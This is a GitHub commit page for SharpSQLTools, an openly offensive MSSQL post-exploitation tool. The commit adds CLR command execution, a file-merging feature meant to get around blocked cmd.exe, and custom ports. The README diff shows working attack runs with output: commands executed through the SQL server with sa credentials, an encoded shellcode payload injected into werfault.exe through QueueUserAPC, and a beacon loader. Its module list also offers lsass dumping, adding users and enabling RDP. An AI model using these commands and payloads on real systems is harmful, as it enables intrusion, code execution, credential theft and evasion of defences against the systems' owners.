Skip to content

Commit 735c8a4

Browse files
uknowsecuknowsec
committed
添加部分功能并更新readme
1.添加clr执行命令和程序 2.添加clr合并文件功能,方便在cmd被拦截时代替copy /b合并文件 3.修改支持自定义端口 4.更新readme
1 parent 7abfb58 commit 735c8a4

File tree

3 files changed

+145
-37
lines changed

3 files changed

+145
-37
lines changed

README.md

Lines changed: 76 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -23,8 +23,8 @@
2323
2424
Usage:
2525
26-
SharpSQLTools target username password database - interactive console
27-
SharpSQLTools target username password database module command - non-interactive console
26+
SharpSQLTools target:port username password database - interactive console
27+
SharpSQLTools target:port username password database module command - non-interactive console
2828
2929
Module:
3030
@@ -40,7 +40,9 @@ enable_clr - you know what it means
4040
disable_clr - you know what it means
4141
install_clr - create assembly and procedure
4242
uninstall_clr - drop clr
43-
clr_dumplsass - dumplsass by clr
43+
clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami
44+
clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files
45+
clr_dumplsass {path} - dumplsass by clr
4446
clr_rdp - check RDP port and Enable RDP
4547
clr_getav - get anti-virus software on this machin by clr
4648
clr_adduser {user} {pass} - add user by clr
@@ -57,8 +59,8 @@ exit - terminates the server process (and this session)
5759
支持交互模式与非交互模式,交互模式直接跟目标,用户名和密码即可。非交互模式直接跟模块与命令。
5860

5961
```
60-
SharpSQLTools target username password database - interactive console
61-
SharpSQLTools target username password database module command - non-interactive console
62+
SharpSQLTools target:port username password database - interactive console
63+
SharpSQLTools target:port username password database module command - non-interactive console
6264
```
6365

6466

@@ -84,6 +86,35 @@ nt authority\system
8486
nt service\mssqlserver
8587
```
8688

89+
#### clr执行命令
90+
91+
```
92+
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec whoami
93+
[*] Database connection is successful!
94+
[+] Process: cmd.exe
95+
[+] arguments: /c whoami
96+
[+] RunCommand: cmd.exe /c whoami
97+
98+
nt service\mssql$sqlexpress
99+
100+
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec -p c:\windows/system32\whoami.exe
101+
[*] Database connection is successful!
102+
[+] Process: c:\windows/system32\whoami.exe
103+
[+] arguments:
104+
[+] RunCommand: c:\windows/system32\whoami.exe
105+
106+
nt service\mssql$sqlexpress
107+
108+
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec -p c:\cmd.exe -a /c whoami
109+
[*] Database connection is successful!
110+
[+] Process: c:\cmd.exe
111+
[+] arguments: /c whoami
112+
[+] RunCommand: c:\cmd.exe /c whoami
113+
114+
nt service\mssql$sqlexpress
115+
116+
```
117+
87118
#### clr_scloader
88119
```
89120
λ python Encrypt.py -f nc.bin -k 1234
@@ -94,7 +125,7 @@ Result: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMe
94125
[*] Database connection is successful!
95126
[+] EncryptShellcode: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMeE3Xw+z51MPPR2WNzYny6YBO/cw57NeG5s7wxMjN8tPJHU3kz42S6eitwunITfTDi0GJ5zfp1uga7fDDkfgX4egL0nXPy/TxzMvUJ0kbFfTF/EDl3CuVE6mtwunIXfTDiVXW6PntwunIvfTDicr81uns14XNrdWlsam5wanJtcGh7t90ScmbO0mt1aGh7vyPbZMvOzW59j0VABm4BATQxc2V9uNR7td2SMjQxe7rReI4xNDgv85wxV3JgeLvXeLjDco59RRUzzud/vdtaMjUxMmp1ixuzXzHN5mRhfwL9fAPzfM7ye73zesz0ebvydYvYPOvRzeZ8uPVZJHBqf73TerrNcIiqkUVTzOF5s/d0MzIzfYlRXlAxMjM0MXNjdWF6utZmZWR5APJZOWhzY9bNVPRwFWYyNXm/dxAp9DNcebvVYmFzY3Vhc2N9zvJyZHjN+3m483+98HOJTf0NtcvkegLmec35vz9ziTy2L1PL5InDgZNkco6Xp46pzud7t/UaDzJNOLPP0Uc2j3YhQVtbMmp1uOjM4Q==
96127
[+] XorKey: 1234
97-
[+] StartProcess notepad.exe
128+
[+] StartProcess werfault.exe
98129
[+] OpenProcess Pid: 2508
99130
[+] VirtualAllocEx Success
100131
[+] QueueUserAPC Inject shellcode to PID: 2508 Success
@@ -104,6 +135,36 @@ Result: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMe
104135
[*] QueueUserAPC Inject shellcode Success, enjoy!
105136
```
106137

138+
#### clr_scloader1
139+
```
140+
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_scloader1 C:\Users\Public\payload.txt aaaa
141+
[*] Database connection is successful!
142+
[+] EncryptShellcodePath: C:\Users\Public\payload.txt
143+
[+] XorKey: aaaa
144+
[+] StartProcess werfault.exe
145+
[+] OpenProcess Pid: 3232
146+
[+] VirtualAllocEx Success
147+
[+] QueueUserAPC Inject shellcode to PID: 3232 Success
148+
[+] hOpenProcessClose Success
149+
150+
151+
[*] QueueUserAPC Inject shellcode Success, enjoy!
152+
```
153+
154+
#### clr_scloader2
155+
```
156+
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_scloader2 C:\Users\Public\beacon.bin
157+
[*] Database connection is successful!
158+
[+] ShellcodePath: C:\Users\Public\beacon.bin
159+
[+] StartProcess werfault.exe
160+
[+] OpenProcess Pid: 332
161+
[+] VirtualAllocEx Success
162+
[+] QueueUserAPC Inject shellcode to PID: 332 Success
163+
[+] hOpenProcessClose Success
164+
165+
166+
[*] QueueUserAPC Inject shellcode Success, enjoy!
167+
```
107168

108169
#### clr_dumplsass
109170

@@ -153,7 +214,15 @@ Result: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMe
153214
[*] Adding Group Member success
154215
```
155216

156-
217+
#### clr_combine
218+
```
219+
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_combine C:\Users\Public\payload.txt
220+
[*] Database connection is successful!
221+
[+] remoteFile: C:\Users\Public\payload.txt
222+
[+] count: 5
223+
[+] combinefile: C:\Users\Public\payload.txt_*.config_txt C:\Users\Public\payload.txt
224+
[*] 'C:\Users\Public\payload.txt_*.config_txt' CombineFile completed
225+
```
157226

158227
#### clr_download
159228

SharpSQLTools/Program.cs

Lines changed: 67 additions & 28 deletions
Original file line numberDiff line numberDiff line change
@@ -30,6 +30,8 @@ private static void Help()
3030
disable_clr - you know what it means
3131
install_clr - create assembly and procedure
3232
uninstall_clr - drop clr
33+
clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami
34+
clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files
3335
clr_dumplsass {path} - dumplsass by clr
3436
clr_rdp - check RDP port and Enable RDP
3537
clr_getav - get anti-virus software on this machin by clr
@@ -255,37 +257,54 @@ static void DownloadFiles(String localFile, String remoteFile)
255257
Console.WriteLine("[*] '{0}' Download completed", remoteFile);
256258
}
257259

258-
public static void OnInfoMessage(object mySender, SqlInfoMessageEventArgs args)
260+
public static string result = string.Empty;
261+
private static void OnInfoMessage(object mySender, SqlInfoMessageEventArgs args)
259262
{
260-
String value = String.Empty;
263+
var value = string.Empty;
261264
foreach (SqlError err in args.Errors)
262265
{
263-
value = err.Message;
264-
Console.WriteLine(value);
266+
value += err.Message;
265267
}
268+
result = value;
269+
Console.WriteLine(result);
266270
}
267271

268-
static void interactive(string[] args)
272+
/// <summary>
273+
/// 数据库连接
274+
/// </summary>
275+
public static SqlConnection SqlConnet(string target, string dbName, string uName, string passwd, ref string result)
269276
{
270-
string target = args[0];
271-
string username = args[1];
272-
string password = args[2];
273-
string database = args[3];
274-
277+
SqlConnection Conn = null;
278+
var connectionString = $"Server = \"{target}\";Database = \"{dbName}\";User ID = \"{uName}\";Password = \"{passwd}\";";
275279
try
276280
{
277-
//sql建立连接
278-
string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target,database, username, password);
279281
Conn = new SqlConnection(connectionString);
280282
Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
281283
Conn.Open();
282-
Console.WriteLine("[*] Database connection is successful!");
284+
result = $"[*] Database connection is successful! {DateTime.Now.ToString()}";
285+
Console.WriteLine(result);
283286
}
284287
catch (Exception ex)
285288
{
286-
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
289+
result = $"[!] Error log: {ex.Message}";
290+
Console.WriteLine(result);
287291
Environment.Exit(0);
288292
}
293+
return Conn;
294+
}
295+
296+
static void interactive(string[] args)
297+
{
298+
string target = args[0];
299+
if (target.Contains(":"))
300+
{
301+
target = target.Replace(":", ",");
302+
}
303+
string username = args[1];
304+
string password = args[2];
305+
string database = args[3];
306+
string result = "";
307+
Conn = SqlConnet(target,database,username,password, ref result);
289308

290309
setting = new Setting(Conn);
291310

@@ -356,6 +375,13 @@ static void interactive(string[] args)
356375
clr_exec(s);
357376
break;
358377
}
378+
case "clr_exec":
379+
{
380+
String s = String.Empty;
381+
for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; }
382+
clr_exec(s);
383+
break;
384+
}
359385
case "clr_scloader":
360386
{
361387
String s = String.Empty;
@@ -384,6 +410,13 @@ static void interactive(string[] args)
384410
clr_exec(s);
385411
break;
386412
}
413+
case "clr_combine":
414+
{
415+
String s = String.Empty;
416+
for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; }
417+
clr_exec(s);
418+
break;
419+
}
387420
case "enable_clr":
388421
setting.Enable_clr();
389422
break;
@@ -429,24 +462,16 @@ static void Noninteractive(string[] args)
429462
return;
430463
}
431464
string target = args[0];
465+
if (target.Contains(":"))
466+
{
467+
target = target.Replace(":", ",");
468+
}
432469
string username = args[1];
433470
string password = args[2];
434471
string database = args[3];
435472
string module = args[4];
436-
try
437-
{
438-
//sql建立连接
439-
string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target, database, username, password);
440-
Conn = new SqlConnection(connectionString);
441-
Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
442-
Conn.Open();
443-
Console.WriteLine("[*] Database connection is successful!");
444-
}
445-
catch (Exception ex)
446-
{
447-
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
448-
Environment.Exit(0);
449-
}
473+
string result = "";
474+
Conn = SqlConnet(target, database, username, password, ref result);
450475

451476
setting = new Setting(Conn);
452477
try
@@ -525,6 +550,13 @@ static void Noninteractive(string[] args)
525550
clr_exec(s);
526551
break;
527552
}
553+
case "clr_exec":
554+
{
555+
String s = String.Empty;
556+
for (int i = 4; i < args.Length; i++) { s += args[i] + " "; }
557+
clr_exec(s);
558+
break;
559+
}
528560
case "clr_scloader":
529561
{
530562
String s = String.Empty;
@@ -553,6 +585,13 @@ static void Noninteractive(string[] args)
553585
clr_exec(s);
554586
break;
555587
}
588+
case "clr_combine":
589+
{
590+
String s = String.Empty;
591+
for (int i = 4; i < args.Length; i++) { s += args[i] + " "; }
592+
clr_exec(s);
593+
break;
594+
}
556595
case "enable_clr":
557596
setting.Enable_clr();
558597
break;

SharpSQLTools/Setting.cs

Lines changed: 2 additions & 2 deletions
Large diffs are not rendered by default.

0 commit comments

Comments
 (0)